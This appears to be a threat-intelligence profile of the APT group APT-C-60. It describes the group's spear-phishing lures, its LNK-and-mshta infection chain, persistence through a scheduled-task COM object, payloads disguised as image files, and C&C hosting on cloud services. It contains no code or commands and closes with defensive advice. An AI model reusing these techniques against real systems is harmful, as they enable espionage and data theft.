APT-C-60 | |
Other Names | Psuedo Hunter |
Location | South Korea |
Date of Initial Activity | 2021 |
Suspected Attribution | APT |
Motivation | Cyberwarfare |
Software | Windows |
Overview
Common targets
Information
Individuals
Public Administration
China
South Korea
Attack Vectors
Phishing
Software Vulnerabilities
How they operate
One of the primary techniques used by APT-C-60 is spear-phishing, where they send highly targeted emails to specific individuals within organizations. These emails often contain malicious attachments or links, disguised as legitimate documents or communications. For example, during an attack on South Korean officials in 2022, APT-C-60 impersonated a Korean graduate student and sent an email that appeared to contain a thesis defense presentation. When the victim downloaded the attached file, it was a compressed RAR file that included a malicious LNK (shortcut) file designed to exploit vulnerabilities and execute malware upon opening. This demonstrates the group’s expertise in creating convincing social engineering tactics to lure victims into executing the malicious payload.
Once the victim opens the malicious file, the malware begins its execution process. The LNK file serves as a downloader, which calls the mshta command to execute remote JavaScript. This JavaScript is obfuscated to evade detection and contains code that downloads further malicious resources from the C&C server. The malware is then decrypted and stored on the victim’s system, typically in a hidden directory within the user’s AppData folder. APT-C-60 uses a file named mssysmon.db, which acts as a persistent downloader Trojan, allowing the group to maintain access to the compromised machine. This persistence is achieved by manipulating Windows’ scheduled tasks, leveraging a COM object tied to the “shared task scheduler” service to ensure that the Trojan remains active even after system reboots.
The downloaded payload, mssysmon.db, is a DLL file that provides the core functionality for the malware. The Trojan’s primary role is to facilitate further exploitation, including information gathering, file stealing, and additional malware delivery. It achieves this by creating a unique event object to ensure that only one instance of the Trojan runs at a time. The malware then communicates with the C&C server at regular intervals, typically every six hours, to receive further instructions and download additional malicious files. These files are often stored in various formats, such as .dib or .bmp, which are commonly used by APT-C-60 to evade detection mechanisms that might flag other file types.
APT-C-60 also employs sophisticated obfuscation techniques to hide its presence on the infected machine. For example, the group uses encrypted configurations to store C&C server URLs, ensuring that the malware can continue to operate even if some communication channels are blocked or disrupted. These encrypted configurations also include other critical information, such as heartbeat intervals and potential fallback C&C addresses. By using legitimate cloud services like Bitbucket and StatCounter for hosting its malicious payloads, APT-C-60 further complicates detection efforts, as these services are often trusted by security systems.
In addition to these techniques, APT-C-60 also utilizes advanced malware to steal sensitive information and enable long-term surveillance of its victims. The remote-control Trojan, TaskControler.dll, is designed to provide the group with full control over the infected system. This malware is capable of performing a wide range of activities, such as loading additional plugins, executing commands, and capturing data from the compromised machine. The group’s ability to perform file theft and other espionage-related tasks without being detected highlights the depth of their technical capabilities.
The operational security of APT-C-60 is also noteworthy. By using a combination of legitimate and private infrastructure for payload hosting and C&C communication, the group is able to stay under the radar of traditional cybersecurity measures. Their use of cloud-based storage services, paired with their ability to rapidly change or delete malicious files after use, allows them to operate in a stealthy manner and significantly reduces the chances of detection.
APT-C-60’s technical operations reflect a high level of sophistication and adaptability. Through a combination of well-crafted spear-phishing attacks, multi-stage malware deployment, and clever use of cloud infrastructure, the group has been able to target high-profile individuals and organizations with significant success. Their advanced evasion techniques and persistent exploitation methods make them a formidable threat. To defend against APT-C-60, organizations must adopt proactive cybersecurity measures, including advanced phishing detection, comprehensive endpoint protection, and real-time monitoring of network traffic for signs of unusual activity. Understanding the technical operations of APT-C-60 is crucial for developing effective countermeasures and mitigating the risk posed by this persistent threat actor.
